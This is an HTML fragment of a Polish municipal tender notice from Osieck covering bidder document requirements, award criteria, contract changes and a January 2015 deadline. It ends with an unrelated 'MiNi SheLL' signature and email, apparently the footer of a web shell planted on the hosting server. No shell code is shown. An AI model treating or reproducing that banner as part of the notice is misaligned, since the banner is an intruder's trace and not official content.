<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy, zgodny w treści ze wzorem stanowiącym załącznik nr 1 do niniejszej specyfikacji,
Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w przypadku składania oferty wspólnej lub gdy umocowanie takie nie wynika ze złożonego odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Czas podjęcia działań w kierunku usunięcia awarii - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwość zmiany treści  umowy:
rezygnacji z części usług, 
zmiany osób przy pomocy, których Wykonawca realizuje przedmiot umowy na inne, pod warunkiem przydzielenia osób o równoważnych kwalifikacjach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.osieck.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Osiecku ul. Rynek 1 08-445 Osieck pok.6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.01.2015 godzina 10:00, miejsce: Ofertę należy złożyć w Urzędzie Gminy w Osiecku, ul. Rynek 1, pok. nr 1 sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com